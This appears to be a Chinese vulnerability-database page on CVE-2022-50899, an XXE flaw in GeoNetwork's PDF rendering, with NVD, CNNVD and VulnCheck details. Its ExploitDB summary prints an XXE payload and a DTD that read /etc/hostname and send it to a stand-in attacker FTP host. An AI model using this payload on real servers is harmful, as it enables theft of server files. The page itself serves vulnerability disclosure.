支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2022-50899 基础信息
漏洞信息
                                        # Geonetwork 4.2.0 XXE漏洞

N/A
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
Geonetwork 4.2.0 - XML External Entity (XXE)
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Geonetwork 3.10 through 4.2.0 contains an XML external entity vulnerability in PDF rendering that allows attackers to retrieve arbitrary files from the server. Attackers can exploit the insecure XML parser by crafting a malicious XML document with external entity references to read system files through the baseURL parameter in PDF creation requests.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
来源:美国国家漏洞数据库 NVD
漏洞类别
XML外部实体引用的不恰当限制(XXE)
来源:美国国家漏洞数据库 NVD
漏洞标题
GeoNetwork 代码问题漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
GeoNetwork是GeoNetwork开源的一个目录应用程序。用于管理空间参考资源。 GeoNetwork 4.2.0及之前版本存在代码问题漏洞,该漏洞源于PDF渲染中存在XML外部实体漏洞,可能导致读取服务器上的任意文件。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
代码问题
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2022-50899 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2022-50899 的情报信息
  • 标题: Geonetwork 4.2.0 - XML External Entity (XXE) - Multiple webapps Exploit -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            ## 关键信息
    
    - **漏洞标题**: Geonetwork 4.2.0 - XML External Entity (XXE)
    - **EDB-ID**: 50982
    - **CVE**: N/A
    - **作者**: Amel BOUZIANE-LEBLOND
    - **类型**: WEBAPPS
    - **平台**: MULTIPLE
    - **日期**: 2022-07-29
    
    ### 漏洞描述
    - **受影响版本**: GeoNetwork 3.10.x to 4.2.0
    - **测试环境**: Microsoft Windows Server & Linux
    - **问题描述**: 在渲染地图的PDF时,从不受信任的来源接收的XML文档解析器未正确配置,可能导致任意文件从服务器中检索。
    
    ### 漏洞利用
    - **XXE Attack XML 示例**:
      ```xml
      <!DOCTYPE foo [<!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1;]>
      <foo>&external;</foo>
      ```
    
    - **DTA文件示例**:
      ```xml
      <!ENTITY % stuff SYSTEM "file:///etc/hostname">
      <!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'">>
      ```
    
    - **说明**: 利用上述方法,攻击者可以构建恶意的XML文件,诱导服务器解析该文件并泄露系统中的文件内容。
                                            
    Geonetwork 4.2.0 - XML External Entity (XXE) - Multiple webapps Exploit
  • 标题: Home — GeoNetwork opensource -- 🔗来源链接

    标签:product

    神龙速读:
                                            从提供的网页截图中,可以获取到以下关于漏洞的关键信息:
    
    - **GeoNetwork是一个用于分享和查找信息的目录应用程序**,通过完整的元数据编辑和审查工具支持信息的发布工作流。这表明,如果这些工具存在安全漏洞,可能会导致信息泄露或未经授权的修改。
    - **用户可以通过关键词、资源类型、组织、规模等进行全文和多面搜索**,并且可以通过这些搜索快速定位感兴趣的记录。这表明,如果搜索功能存在漏洞,可能会被用于信息窥探或SQL注入攻击。
    - **GeoNetwork提供了一种易于使用Web界面来搜索多个目录中的地理空间数据**。这表明,如果Web界面存在漏洞,可能会被用于针对多个目录的攻击。
    - **GeoNetwork提供了一个通用的目录,用于分享信息,可以轻松浏览记录、查找来源或服务、发布数据集**。如果这个目录功能存在漏洞,可能会导致数据集的泄露或篡改。
    - **GeoNetwork提供了一个可以访问开放OGC服务(WMS, WMTS)和REST服务(特征服务,MapService)的交互式地图查看器OpenLayers**,还支持标准格式(KML, OWS)。如果这个交互式地图查看器或服务存在漏洞,可能会导致地理数据的泄露或恶意使用。
    - GeoNetwork支持多种元数据格式和标准(Dublin Core, ISO-19115, ISO-19119, ISO-19110),并且提供在线元数据编辑工具。如果这些工具或标准实现存在漏洞,可能会导致元数据的篡改或信息泄露。
    - GeoNetwork提供了一个可以轻松发布信息的编辑器仪表板和一个完整的发布工作流,以便在发布前审查和批准更改。如果这个发布工作流存在漏洞,可能会导致未经授权的信息发布或篡改。
    - GeoNetwork提供了一个易于定制和扩展的界面,包括颜色和标志调整、Bootstrap主题以及插件机制。如果这个定制和扩展功能存在漏洞,可能会导致安装和使用恶意插件的风险。
    - GeoNetwork提供了一个REST API,可与GeoNetwork客户端和外部系统一起使用。如果这个API存在漏洞,可能会被用于未经授权的访问或数据操作。
                                            
    Home — GeoNetwork opensource
  • 标题: Geonetwork 4.2.0 - XML External Entity (XXE) | Advisories | VulnCheck -- 🔗来源链接

    标签:third-party-advisory

    神龙速读:
                                            ### 关键漏洞信息
    
    **漏洞名称:**  
    Geonetwork 4.2.0 - XML External Entity (XXE)
    
    **严重性:**  
    HIGH
    
    **日期:**  
    January 13, 2026
    
    **影响:**  
    - GeoNetwork <= 4.2.0
    
    **CVE ID:**  
    CVE-2022-50899
    
    **CWE ID:**  
    CWE-611 Improper Restriction of XML External Entity Reference
    
    **CVSS 分数:**  
    5.4 (CVSS:3.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
    
    **相关链接:**  
    - ExploitDB ID: 50982  
    - Geonetwork Official Homepage  
    
    **信用:**  
    Amel BOUZIANE-LEBLOND
    
    **描述:**  
    Geonetwork 3.10 至 4.2.0 包含一个在PDF渲染中的XML外部实体漏洞,允许攻击者从服务器检索任意文件。攻击者可以通过利用不安全的XML解析器,创建带有外部实体引用的恶意XML文档,通过PDF创建请求中的baseURL参数来读取系统文件。
                                            
    Geonetwork 4.2.0 - XML External Entity (XXE) | Advisories | VulnCheck
  • https://nvd.nist.gov/vuln/detail/CVE-2022-50899
四、漏洞 CVE-2022-50899 的评论
匿名用户
2026-01-15 06:09:05

Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.


发表评论